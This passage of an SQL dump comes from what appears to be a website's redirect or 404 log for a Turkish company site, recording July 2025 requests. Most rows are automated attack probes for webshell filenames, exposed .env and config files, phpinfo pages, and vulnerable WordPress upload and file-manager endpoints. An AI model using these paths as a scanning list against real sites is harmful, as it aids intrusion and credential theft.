00:00:00',301),(43143,'http://3s-technologies.com.tr/tr/vhosts/function.php',NULL,'','',1,0,'2025-07-14 03:46:11','0000-00-00 00:00:00',301),(43144,'http://3s-technologies.com.tr/tr/vhosts/header.php',NULL,'','',1,0,'2025-07-14 03:46:12','0000-00-00 00:00:00',301),(43145,'http://3s-technologies.com.tr/tr/vhosts/index.php',NULL,'','',1,0,'2025-07-14 03:46:13','0000-00-00 00:00:00',301),(43146,'http://3s-technologies.com.tr/tr/vhosts/item.php',NULL,'','',1,0,'2025-07-14 03:46:13','0000-00-00 00:00:00',301),(43147,'http://3s-technologies.com.tr/tr/vhosts/main.php',NULL,'','',1,0,'2025-07-14 03:46:14','0000-00-00 00:00:00',301),(43148,'http://3s-technologies.com.tr/tr/vhosts/makeasmtp.php',NULL,'','',1,0,'2025-07-14 03:46:15','0000-00-00 00:00:00',301),(43149,'http://3s-technologies.com.tr/tr/vhosts/nf_tracking.php',NULL,'','',1,0,'2025-07-14 03:46:16','0000-00-00 00:00:00',301),(43150,'http://3s-technologies.com.tr/tr/ovaajwoju.php',NULL,'','',1,0,'2025-07-14 03:46:17','0000-00-00 00:00:00',301),(43151,'http://3s-technologies.com.tr/tr/vhosts/ovaajwoju.php',NULL,'','',1,0,'2025-07-14 03:46:17','0000-00-00 00:00:00',301),(43152,'http://3s-technologies.com.tr/tr/ovaallxgr.php',NULL,'','',1,0,'2025-07-14 03:46:18','0000-00-00 00:00:00',301),(43153,'http://3s-technologies.com.tr/tr/vhosts/ovaallxgr.php',NULL,'','',1,0,'2025-07-14 03:46:18','0000-00-00 00:00:00',301),(43154,'http://3s-technologies.com.tr/tr/ovaimzppa.php',NULL,'','',1,0,'2025-07-14 03:46:19','0000-00-00 00:00:00',301),(43155,'http://3s-technologies.com.tr/tr/vhosts/ovaimzppa.php',NULL,'','',1,0,'2025-07-14 03:46:19','0000-00-00 00:00:00',301),(43156,'http://3s-technologies.com.tr/tr/ovaizmsld.php',NULL,'','',1,0,'2025-07-14 03:46:20','0000-00-00 00:00:00',301),(43157,'http://3s-technologies.com.tr/tr/vhosts/ovaizmsld.php',NULL,'','',1,0,'2025-07-14 03:46:20','0000-00-00 00:00:00',301),(43158,'http://3s-technologies.com.tr/tr/ovajnhgdr.php',NULL,'','',1,0,'2025-07-14 03:46:21','0000-00-00 00:00:00',301),(43159,'http://3s-technologies.com.tr/tr/vhosts/ovajnhgdr.php',NULL,'','',1,0,'2025-07-14 03:46:21','0000-00-00 00:00:00',301),(43160,'http://3s-technologies.com.tr/tr/vhosts/simple.php',NULL,'','',1,0,'2025-07-14 03:46:22','0000-00-00 00:00:00',301),(43161,'http://3s-technologies.com.tr/tr/vhosts/wander.php',NULL,'','',1,0,'2025-07-14 03:46:23','0000-00-00 00:00:00',301),(43162,'http://3s-technologies.com.tr/tr/vhosts/wp-pano.php',NULL,'','',1,0,'2025-07-14 03:46:24','0000-00-00 00:00:00',301),(43163,'http://3s-technologies.com.tr/tr/hb02ugyh.php',NULL,'','',8,0,'2025-07-14 03:46:26','0000-00-00 00:00:00',301),(43164,'http://3s-technologies.com.tr/tr/style_cww3.php',NULL,'','',1,0,'2025-07-14 03:46:27','0000-00-00 00:00:00',301),(43165,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/db.php',NULL,'','',31,0,'2025-07-14 03:47:11','0000-00-00 00:00:00',301),(43166,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/db.php',NULL,'','',30,0,'2025-07-14 03:47:12','0000-00-00 00:00:00',301),(43167,'http://3s-technologies.com.tr/tr/img/xmrlpc.php',NULL,'','',18,0,'2025-07-14 03:47:16','0000-00-00 00:00:00',301),(43168,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/xmrlpc.php',NULL,'','',18,0,'2025-07-14 03:47:16','0000-00-00 00:00:00',301),(43169,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/xmrlpc.php',NULL,'','',22,0,'2025-07-14 03:47:18','0000-00-00 00:00:00',301),(43170,'http://3s-technologies.com.tr/tr/uploads/upload-size.php',NULL,'','',3,0,'2025-07-14 05:04:50','0000-00-00 00:00:00',301),(43171,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-plugin-dependencies-package.php',NULL,'','',1,0,'2025-07-14 05:04:51','0000-00-00 00:00:00',301),(43172,'http://3s-technologies.com.tr/tr/wp-admin/images/bootstrap.php',NULL,'','',1,0,'2025-07-14 05:04:54','0000-00-00 00:00:00',301),(43173,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/i8nkhbiy.php?bdkr28=huic',NULL,'','',1,0,'2025-07-14 05:04:56','0000-00-00 00:00:00',301),(43174,'http://3s-technologies.com.tr/tr/wp-admin/js/domain.php',NULL,'','',1,0,'2025-07-14 05:04:58','0000-00-00 00:00:00',301),(43175,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-metadata-registry.php',NULL,'','',1,0,'2025-07-14 05:05:00','0000-00-00 00:00:00',301),(43176,'http://3s-technologies.com.tr/tr/wp-admin/includes/import-method.php',NULL,'','',2,0,'2025-07-14 05:05:02','0000-00-00 00:00:00',301),(43177,'http://3s-technologies.com.tr/tr/wp-admin/includes/plugin-install.php.infected.php',NULL,'','',5,0,'2025-07-14 05:05:03','0000-00-00 00:00:00',301),(43178,'http://3s-technologies.com.tr/tr/wp-includes/images/media/ydcpzsvreg.php',NULL,'','',1,0,'2025-07-14 05:05:05','0000-00-00 00:00:00',301),(43179,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/bolt.php',NULL,'','',1,0,'2025-07-14 05:05:06','0000-00-00 00:00:00',301),(43180,'http://3s-technologies.com.tr/tr/wp-content/languages/wp-commentse.php',NULL,'','',1,0,'2025-07-14 05:05:08','0000-00-00 00:00:00',301),(43181,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/hjerwqiotys.php',NULL,'','',3,0,'2025-07-14 05:05:09','0000-00-00 00:00:00',301),(43182,'http://3s-technologies.com.tr/tr/wp-includes/wp-class-db.php',NULL,'','',3,0,'2025-07-14 05:05:10','0000-00-00 00:00:00',301),(43183,'http://3s-technologies.com.tr/tr/images/right_scrolling.php',NULL,'','',1,0,'2025-07-14 05:05:11','0000-00-00 00:00:00',301),(43184,'http://3s-technologies.com.tr/tr/wp-admin/maint/browser.php',NULL,'','',1,0,'2025-07-14 05:05:13','0000-00-00 00:00:00',301),(43185,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-theme-json-loop.php',NULL,'','',1,0,'2025-07-14 05:05:14','0000-00-00 00:00:00',301),(43186,'http://3s-technologies.com.tr/tr/wp-admin/includes/sts.php',NULL,'','',2,0,'2025-07-14 05:05:15','0000-00-00 00:00:00',301),(43187,'http://3s-technologies.com.tr/tr/wp-admin/maint/uitfzafs.php',NULL,'','',1,0,'2025-07-14 05:05:15','0000-00-00 00:00:00',301),(43188,'http://3s-technologies.com.tr/tr/file5.php',NULL,'','',98,0,'2025-07-14 05:05:17','0000-00-00 00:00:00',301),(43189,'http://3s-technologies.com.tr/tr/wp-content/languages/eagle.php',NULL,'','',1,0,'2025-07-14 05:05:18','0000-00-00 00:00:00',301),(43190,'http://3s-technologies.com.tr/tr/uploads/phpimage.php',NULL,'','',9,0,'2025-07-14 05:05:20','0000-00-00 00:00:00',301),(43191,'http://3s-technologies.com.tr/tr/wp-includes/pageup.php',NULL,'','',1,0,'2025-07-14 05:05:21','0000-00-00 00:00:00',301),(43192,'http://3s-technologies.com.tr/tr/wp-admin/css/by.php',NULL,'','',2,0,'2025-07-14 05:05:22','0000-00-00 00:00:00',301),(43193,'http://3s-technologies.com.tr/tr/wp-includes/post-formats-list.php',NULL,'','',1,0,'2025-07-14 05:05:22','0000-00-00 00:00:00',301),(43194,'http://3s-technologies.com.tr/tr/wp-admin/css/joqgrok.php',NULL,'','',1,0,'2025-07-14 05:05:23','0000-00-00 00:00:00',301),(43195,'http://3s-technologies.com.tr/tr/wp-content/upgrade/bdkr28_ysfpy5qo.php',NULL,'','',1,0,'2025-07-14 05:05:24','0000-00-00 00:00:00',301),(43196,'http://3s-technologies.com.tr/tr/wp-content/uploads/config.1737563113.php',NULL,'','',1,0,'2025-07-14 05:05:25','0000-00-00 00:00:00',301),(43197,'http://3s-technologies.com.tr/tr/wp-admin/includes/import-set.php',NULL,'','',1,0,'2025-07-14 05:05:27','0000-00-00 00:00:00',301),(43198,'http://3s-technologies.com.tr/tr/wp-admin/maint/foifra.php',NULL,'','',1,0,'2025-07-14 05:05:28','0000-00-00 00:00:00',301),(43199,'http://3s-technologies.com.tr/tr/wp-includes/system-ctl.php',NULL,'','',1,0,'2025-07-14 05:05:30','0000-00-00 00:00:00',301),(43200,'http://3s-technologies.com.tr/tr/wp-includes/feed-rdf-character.php',NULL,'','',1,0,'2025-07-14 05:05:31','0000-00-00 00:00:00',301),(43201,'http://3s-technologies.com.tr/tr/files/files_uploader.php',NULL,'','',1,0,'2025-07-14 05:05:33','0000-00-00 00:00:00',301),(43202,'http://3s-technologies.com.tr/tr/wp-admin/includes/schema-schema.php',NULL,'','',1,0,'2025-07-14 05:05:34','0000-00-00 00:00:00',301),(43203,'http://3s-technologies.com.tr/tr/images/changetoavif.php',NULL,'','',1,0,'2025-07-14 05:05:35','0000-00-00 00:00:00',301),(43204,'http://3s-technologies.com.tr/tr/wp-includes/widgets/info.php',NULL,'','',1,0,'2025-07-14 05:05:36','0000-00-00 00:00:00',301),(43205,'http://3s-technologies.com.tr/tr/wp-includes/header.php',NULL,'','',4,0,'2025-07-14 05:05:38','0000-00-00 00:00:00',301),(43206,'http://3s-technologies.com.tr/tr/wp-includes/text/function.php',NULL,'','',1,0,'2025-07-14 05:05:41','0000-00-00 00:00:00',301),(43207,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal/domain.php',NULL,'','',1,0,'2025-07-14 05:05:42','0000-00-00 00:00:00',301),(43208,'http://3s-technologies.com.tr/tr/wp-admin/css/tfmfkx.php',NULL,'','',1,0,'2025-07-14 05:05:44','0000-00-00 00:00:00',301),(43209,'http://3s-technologies.com.tr/tr/wp-includes/fonts/class-wp-font-utils.php',NULL,'','',4,0,'2025-07-14 05:05:45','0000-00-00 00:00:00',301),(43210,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/class-wp-sitemaps-data.php',NULL,'','',4,0,'2025-07-14 05:05:45','0000-00-00 00:00:00',301),(43211,'http://3s-technologies.com.tr/tr/wp-includes/fonts/class-wp-font-face-resolver.php',NULL,'','',2,0,'2025-07-14 05:05:50','0000-00-00 00:00:00',301),(43212,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-styles-exception.php',NULL,'','',1,0,'2025-07-14 05:05:50','0000-00-00 00:00:00',301),(43213,'http://3s-technologies.com.tr/tr/wp-admin/includes/hexx.php',NULL,'','',1,0,'2025-07-14 05:05:53','0000-00-00 00:00:00',301),(43214,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-parser-frame.php',NULL,'','',1,0,'2025-07-14 05:05:54','0000-00-00 00:00:00',301),(43215,'http://3s-technologies.com.tr/tr/wp-admin/includes/template.php.infected.php',NULL,'','',4,0,'2025-07-14 05:05:57','0000-00-00 00:00:00',301),(43216,'http://3s-technologies.com.tr/tr/wp-admin/maint/hel.php',NULL,'','',1,0,'2025-07-14 05:05:58','0000-00-00 00:00:00',301),(43217,'http://3s-technologies.com.tr/tr/wp-admin/css/scrvr.php',NULL,'','',1,0,'2025-07-14 05:06:05','0000-00-00 00:00:00',301),(43218,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-page-xf7lz4.php',NULL,'','',1,0,'2025-07-14 05:06:06','0000-00-00 00:00:00',301),(43219,'http://3s-technologies.com.tr/tr/uploads/@.php',NULL,'','',1,0,'2025-07-14 05:06:07','0000-00-00 00:00:00',301),(43220,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal/option.php',NULL,'','',1,0,'2025-07-14 05:06:08','0000-00-00 00:00:00',301),(43221,'http://3s-technologies.com.tr/tr/wp-includes/footer.php',NULL,'','',2,0,'2025-07-14 05:06:09','0000-00-00 00:00:00',301),(43222,'http://3s-technologies.com.tr/tr/wp-includes/class-feed-branch.php',NULL,'','',1,0,'2025-07-14 05:06:11','0000-00-00 00:00:00',301),(43223,'http://3s-technologies.com.tr/tr/wp-admin/images/domain.php',NULL,'','',1,0,'2025-07-14 05:06:13','0000-00-00 00:00:00',301),(43224,'http://3s-technologies.com.tr/tr/wp-admin/css/wp-7jau3cnq1m.php',NULL,'','',1,0,'2025-07-14 05:06:14','0000-00-00 00:00:00',301),(43225,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-archives-schema.php',NULL,'','',1,0,'2025-07-14 05:06:15','0000-00-00 00:00:00',301),(43226,'http://3s-technologies.com.tr/tr/domain.php',NULL,'','',1,0,'2025-07-14 05:06:17','0000-00-00 00:00:00',301),(43227,'http://3s-technologies.com.tr/tr/wp-includes/pomo/custom-file-2-1750458941.php',NULL,'','',2,0,'2025-07-14 05:06:18','0000-00-00 00:00:00',301),(43228,'http://3s-technologies.com.tr/tr/images/phpimage.php',NULL,'','',3,0,'2025-07-14 05:06:19','0000-00-00 00:00:00',301),(43229,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/zeal.php',NULL,'','',1,0,'2025-07-14 05:06:21','0000-00-00 00:00:00',301),(43230,'http://3s-technologies.com.tr/tr/wp-includes/fonts/font.php',NULL,'','',1,0,'2025-07-14 05:06:24','0000-00-00 00:00:00',301),(43231,'http://3s-technologies.com.tr/tr/wp-admin/includes/theme-install.php.infected.php',NULL,'','',4,0,'2025-07-14 05:06:32','0000-00-00 00:00:00',301),(43232,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/admin.php',NULL,'','',1,0,'2025-07-14 05:06:33','0000-00-00 00:00:00',301),(43233,'http://3s-technologies.com.tr/tr/uploads/import_excel.php',NULL,'','',1,0,'2025-07-14 05:06:34','0000-00-00 00:00:00',301),(43234,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/let.php',NULL,'','',1,0,'2025-07-14 05:06:36','0000-00-00 00:00:00',301),(43235,'http://3s-technologies.com.tr/tr/wp-content/languages/ru_ru.l10n.php',NULL,'','',1,0,'2025-07-14 05:06:38','0000-00-00 00:00:00',301),(43236,'http://3s-technologies.com.tr/tr/wp-admin/includes/browser.php',NULL,'','',1,0,'2025-07-14 05:06:39','0000-00-00 00:00:00',301),(43237,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/ev.php',NULL,'','',1,0,'2025-07-14 05:06:41','0000-00-00 00:00:00',301),(43238,'http://3s-technologies.com.tr/tr/images/product_image_5d938daaa3cd2.php',NULL,'','',1,0,'2025-07-14 05:06:43','0000-00-00 00:00:00',301),(43239,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/3s-cnc-01-750x750-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-07-14 06:26:04','0000-00-00 00:00:00',301),(43240,'http://www.3s-technologies.com.tr/tr/admin/plugins/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-07-14 08:50:42','0000-00-00 00:00:00',301),(43241,'http://www.3s-technologies.com.tr/tr/vendor/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-07-14 08:50:46','0000-00-00 00:00:00',301),(43242,'https://www.3s-technologies.com.tr/wp-json/sure-triggers/v1/automation/action',NULL,'','',1,0,'2025-07-14 13:42:39','0000-00-00 00:00:00',301),(43243,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/fields/radio.php',NULL,'','',5,0,'2025-07-14 14:54:22','0000-00-00 00:00:00',301),(43244,'http://3s-technologies.com.tr/tr/wp-admin/block-support.php',NULL,'','',5,0,'2025-07-14 14:54:31','0000-00-00 00:00:00',301),(43245,'http://3s-technologies.com.tr/tr/wp-includes/block-support.php',NULL,'','',5,0,'2025-07-14 14:54:33','0000-00-00 00:00:00',301),(43246,'http://3s-technologies.com.tr/tr/debug.php',NULL,'http://3s-technologies.com.tr/debug.php','',11,0,'2025-07-14 21:12:39','0000-00-00 00:00:00',301),(43247,'http://3s-technologies.com.tr/tr/system-info.php',NULL,'http://3s-technologies.com.tr/system-info.php','',2,0,'2025-07-14 21:12:41','0000-00-00 00:00:00',301),(43248,'http://3s-technologies.com.tr/tr/rest-api/about.php',NULL,'','',1,0,'2025-07-14 22:05:53','0000-00-00 00:00:00',301),(43249,'http://www.3s-technologies.com.tr/tr/pub/rf',NULL,'http://www.3s-technologies.com.tr/pub/rf','',3,0,'2025-07-15 16:22:45','0000-00-00 00:00:00',301),(43250,'https://3s-technologies.com.tr/en/changelog.txt',NULL,'','',1,0,'2025-07-15 20:18:12','0000-00-00 00:00:00',301),(43251,'http://3s-technologies.com.tr/tr/wp-content/plugins/whatsmyrank-devenc/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2025-07-16 03:05:35','0000-00-00 00:00:00',301),(43252,'http://3s-technologies.com.tr/tr/assets/responsysimages',NULL,'http://3s-technologies.com.tr/assets/responsysimages','',2,0,'2025-07-16 19:44:47','0000-00-00 00:00:00',301),(43253,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2025-07-18 02:24:18','0000-00-00 00:00:00',301),(43254,'https://www.3s-technologies.com.tr/en/a',NULL,'','',3,0,'2025-07-18 10:29:47','0000-00-00 00:00:00',301),(43255,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' d.href \'',NULL,'','',4,0,'2025-07-18 10:44:03','0000-00-00 00:00:00',301),(43256,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' c \'',NULL,'','',5,0,'2025-07-18 10:44:05','0000-00-00 00:00:00',301),(43257,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' (/^https/i.test(window.location.href||',NULL,'','',5,0,'2025-07-18 10:44:06','0000-00-00 00:00:00',301),(43258,'https://www.3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videoposter   \'',NULL,'','',4,0,'2025-07-18 10:49:23','0000-00-00 00:00:00',301),(43259,'https://www.3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videourl   \'',NULL,'','',4,0,'2025-07-18 10:49:24','0000-00-00 00:00:00',301),(43260,'http://3s-technologies.com.tr/tr/wp-admin/fucku.php',NULL,'','',6,0,'2025-07-18 21:33:14','0000-00-00 00:00:00',301),(43261,'https://www.3s-technologies.com.tr/tr/.env.save',NULL,'https://www.3s-technologies.com.tr/.env.save','',10,0,'2025-07-19 09:33:36','0000-00-00 00:00:00',301),(43262,'https://www.3s-technologies.com.tr/tr/core/.env',NULL,'https://www.3s-technologies.com.tr/core/.env','',9,0,'2025-07-19 09:33:37','0000-00-00 00:00:00',301),(43263,'http://3s-technologies.com.tr/tr/app_dev.php/_profiler/phpinfo',NULL,'','',4,0,'2025-07-19 11:33:09','0000-00-00 00:00:00',301),(43264,'http://3s-technologies.com.tr/tr/app/etc/env.php',NULL,'','',1,0,'2025-07-19 11:33:11','0000-00-00 00:00:00',301),(43265,'http://3s-technologies.com.tr/tr/secured/phpinfo.php',NULL,'','',1,0,'2025-07-19 11:33:15','0000-00-00 00:00:00',301),(43266,'http://3s-technologies.com.tr/tr/config/config.php',NULL,'','',1,0,'2025-07-19 11:33:16','0000-00-00 00:00:00',301),(43267,'http://3s-technologies.com.tr/tr/env',NULL,'','',1,0,'2025-07-19 11:33:31','0000-00-00 00:00:00',301),(43268,'http://3s-technologies.com.tr/tr/server/config/.env',NULL,'','',1,0,'2025-07-19 11:33:34','0000-00-00 00:00:00',301),(43269,'http://3s-technologies.com.tr/tr/lib/.env',NULL,'','',1,0,'2025-07-19 11:33:36','0000-00-00 00:00:00',301),(43270,'http://3s-technologies.com.tr/tr/lab/.env',NULL,'','',1,0,'2025-07-19 11:33:37','0000-00-00 00:00:00',301),(43271,'http://3s-technologies.com.tr/tr/cronlab/.env',NULL,'','',1,0,'2025-07-19 11:33:39','0000-00-00 00:00:00',301),(43272,'http://3s-technologies.com.tr/tr/cron/.env',NULL,'','',1,0,'2025-07-19 11:33:40','0000-00-00 00:00:00',301),(43273,'http://3s-technologies.com.tr/tr/core/app/.env',NULL,'','',1,0,'2025-07-19 11:33:43','0000-00-00 00:00:00',301),(43274,'https://3s-technologies.com.tr/wp-login.php?action=register',NULL,'','',1,0,'2025-07-19 20:24:30','0000-00-00 00:00:00',301),(43275,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/mar.ph',NULL,'','',1,0,'2025-07-20 19:32:12','0000-00-00 00:00:00',301),(43276,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/admin.php',NULL,'','',5,0,'2025-07-20 19:33:18','0000-00-00 00:00:00',301),(43277,'http://3s-technologies.com.tr/tr/wp-includes/id3/install.php',NULL,'','',2,0,'2025-07-20 19:33:25','0000-00-00 00:00:00',301),(43278,'http://3s-technologies.com.tr/tr/wp/abe.php',NULL,'','',2,0,'2025-07-20 19:33:39','0000-00-00 00:00:00',301),(43279,'http://3s-technologies.com.tr/tr/wp-includes/options.php',NULL,'','',2,0,'2025-07-20 19:33:40','0000-00-00 00:00:00',301),(43280,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/admin.php',NULL,'','',2,0,'2025-07-20 19:34:03','0000-00-00 00:00:00',301),(43281,'http://3s-technologies.com.tr/tr/vendor/composer/index.php',NULL,'','',2,0,'2025-07-20 19:34:11','0000-00-00 00:00:00',301),(43282,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/admin.php',NULL,'','',3,0,'2025-07-20 19:34:13','0000-00-00 00:00:00',301),(43283,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/admin.php',NULL,'','',3,0,'2025-07-20 19:34:18','0000-00-00 00:00:00',301),(43284,'http://3s-technologies.com.tr/tr/go.id',NULL,'','',1,0,'2025-07-20 19:35:58','0000-00-00 00:00:00',301),(43285,'http://3s-technologies.com.tr/tr/ac.id',NULL,'','',1,0,'2025-07-20 19:35:58','0000-00-00 00:00:00',301),(43286,'http://3s-technologies.com.tr/tr/auth.php',NULL,'','',41,0,'2025-07-21 05:43:27','0000-00-00 00:00:00',301),(43287,'http://3s-technologies.com.tr/tr/class-wp.php',NULL,'','',17,0,'2025-07-21 05:43:33','0000-00-00 00:00:00',301),(43288,'http://3s-technologies.com.tr/tr/fonts.php',NULL,'','',5,0,'2025-07-21 05:43:44','0000-00-00 00:00:00',301),(43289,'http://3s-technologies.com.tr/tr/info',NULL,'','',3,0,'2025-07-21 05:43:52','0000-00-00 00:00:00',301),(43290,'http://3s-technologies.com.tr/tr/man.php',NULL,'','',26,0,'2025-07-21 05:43:59','0000-00-00 00:00:00',301),(43291,'http://3s-technologies.com.tr/tr/man.php7',NULL,'','',7,0,'2025-07-21 05:43:59','0000-00-00 00:00:00',301),(43292,'http://3s-technologies.com.tr/tr/mango.php',NULL,'','',5,0,'2025-07-21 05:44:00','0000-00-00 00:00:00',301),(43293,'http://3s-technologies.com.tr/tr/signup.php',NULL,'','',5,0,'2025-07-21 05:44:07','0000-00-00 00:00:00',301),(43294,'http://3s-technologies.com.tr/tr/wp-activat.php',NULL,'','',14,0,'2025-07-21 05:44:16','0000-00-00 00:00:00',301),(43295,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light',NULL,'','',16,0,'2025-07-21 05:44:22','0000-00-00 00:00:00',301),(43296,'http://3s-technologies.com.tr/tr/wp-content/languages',NULL,'','',9,0,'2025-07-21 05:44:40','0000-00-00 00:00:00',301),(43297,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor-pro/modules/woocommerce/skins',NULL,'','',2,0,'2025-07-21 05:44:44','0000-00-00 00:00:00',301),(43298,'http://3s-technologies.com.tr/tr/wp-content/plugins/shell',NULL,'','',4,0,'2025-07-21 05:44:48','0000-00-00 00:00:00',301),(43299,'http://3s-technologies.com.tr/tr/wp-content/plugins/shell/text.php',NULL,'','',1,0,'2025-07-21 05:44:48','0000-00-00 00:00:00',301),(43300,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpforms-lite/templates/admin/empty-states/payments',NULL,'','',2,0,'2025-07-21 05:44:49','0000-00-00 00:00:00',301),(43301,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/ioxi-o.php',NULL,'','',1,0,'2025-07-21 05:44:52','0000-00-00 00:00:00',301),(43302,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfive/styles/sections',NULL,'','',2,0,'2025-07-21 05:44:53','0000-00-00 00:00:00',301),(43303,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/styles',NULL,'','',2,0,'2025-07-21 05:44:55','0000-00-00 00:00:00',301),(43304,'http://3s-technologies.com.tr/tr/wp-content/updraft',NULL,'','',3,0,'2025-07-21 05:44:56','0000-00-00 00:00:00',301),(43305,'http://3s-technologies.com.tr/tr/wp-content/about.php7',NULL,'','',1,0,'2025-07-21 05:45:02','0000-00-00 00:00:00',301),(43306,'http://3s-technologies.com.tr/tr/wp-content/x',NULL,'','',3,0,'2025-07-21 05:45:03','0000-00-00 00:00:00',301),(43307,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/http',NULL,'','',3,0,'2025-07-21 05:45:15','0000-00-00 00:00:00',301),(43308,'http://3s-technologies.com.tr/tr/wp-includes/blocks/archives',NULL,'','',8,0,'2025-07-21 05:45:22','0000-00-00 00:00:00',301),(43309,'http://3s-technologies.com.tr/tr/wp-includes/blocks/embed',NULL,'','',2,0,'2025-07-21 05:45:25','0000-00-00 00:00:00',301),(43310,'http://3s-technologies.com.tr/tr/wp-includes/blocks/file',NULL,'','',3,0,'2025-07-21 05:45:25','0000-00-00 00:00:00',301),(43311,'http://3s-technologies.com.tr/tr/wp-includes/blocks/group',NULL,'','',5,0,'2025-07-21 05:45:26','0000-00-00 00:00:00',301),(43312,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/components',NULL,'','',4,0,'2025-07-21 05:45:31','0000-00-00 00:00:00',301),(43313,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/customize-widgets',NULL,'','',5,0,'2025-07-21 05:45:32','0000-00-00 00:00:00',301),(43314,'http://3s-technologies.com.tr/tr/wp-includes/js/swfupload/about.php7',NULL,'','',1,0,'2025-07-21 05:45:44','0000-00-00 00:00:00',301),(43315,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins',NULL,'','',2,0,'2025-07-21 05:45:46','0000-00-00 00:00:00',301),(43316,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/hr',NULL,'','',2,0,'2025-07-21 05:45:47','0000-00-00 00:00:00',301),(43317,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins',NULL,'','',3,0,'2025-07-21 05:45:47','0000-00-00 00:00:00',301),(43318,'http://3s-technologies.com.tr/tr/wp-includes/l10n',NULL,'','',51,0,'2025-07-21 05:45:49','0000-00-00 00:00:00',301),(43319,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/about.php7',NULL,'','',1,0,'2025-07-21 05:45:51','0000-00-00 00:00:00',301),(43320,'http://3s-technologies.com.tr/tr/wp-includes/wp-class.php/wp-content/themes/travelscape',NULL,'','',3,0,'2025-07-21 05:46:01','0000-00-00 00:00:00',301),(43321,'http://3s-technologies.com.tr/tr/wp-link.php/wp-content/plugins/wp-content/uploads/wp_live_chat',NULL,'','',2,0,'2025-07-21 05:46:02','0000-00-00 00:00:00',301),(43322,'http://3s-technologies.com.tr/tr/wp/wp-content/themes/twentytwenty/template-parts',NULL,'','',2,0,'2025-07-21 05:46:05','0000-00-00 00:00:00',301),(43323,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/3s-technologies.com.tr/joomla/en?itemid=429',NULL,'','',1,0,'2025-07-21 07:42:59','0000-00-00 00:00:00',301),(43324,'http://3s-technologies.com.tr/tr/favicon.png',NULL,'','',6,0,'2025-07-21 19:31:42','0000-00-00 00:00:00',301),(43325,'http://3s-technologies.com.tr/tr/home.zip',NULL,'','',1,0,'2025-07-22 14:57:48','0000-00-00 00:00:00',301),(43326,'http://3s-technologies.com.tr/tr/blog.zip',NULL,'','',1,0,'2025-07-22 14:57:51','0000-00-00 00:00:00',301),(43327,'http://3s-technologies.com.tr/en/wp-content/plugins/init-help/init.php',NULL,'www.google.com','',2,0,'2025-07-23 09:10:10','0000-00-00 00:00:00',301),(43328,'https://3s-technologies.com.tr/tr/app_dev.php/_profiler/open?file=app/config/parameters.yml',NULL,'https://3s-technologies.com.tr/app_dev.php/_profiler/open?file=app/config/parameters.yml','',1,0,'2025-07-23 10:26:38','0000-00-00 00:00:00',301),(43329,'http://3s-technologies.com.tr/wp-admin/async-upload.php',NULL,'https://www.google.com/','',4,0,'2025-07-23 11:47:30','0000-00-00 00:00:00',301),(43330,'http://3s-technologies.com.tr/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'https://www.google.com/','',5,0,'2025-07-23 11:47:32','0000-00-00 00:00:00',301),(43331,'http://3s-technologies.com.tr/wp-json/wp/v2/media',NULL,'https://www.google.com/','',4,0,'2025-07-23 11:47:34','0000-00-00 00:00:00',301),(43332,'http://3s-technologies.com.tr/wp-content/plugins/formcraft/file-upload/server/php/index.php',NULL,'https://www.google.com/','',4,0,'2025-07-23 11:47:35','0000-00-00 00:00:00',301),(43333,'http://3s-technologies.com.tr/wp-content/plugins/revslider/includes/upload.php',NULL,'https://www.google.com/','',3,0,'2025-07-23 12:36:16','0000-00-00 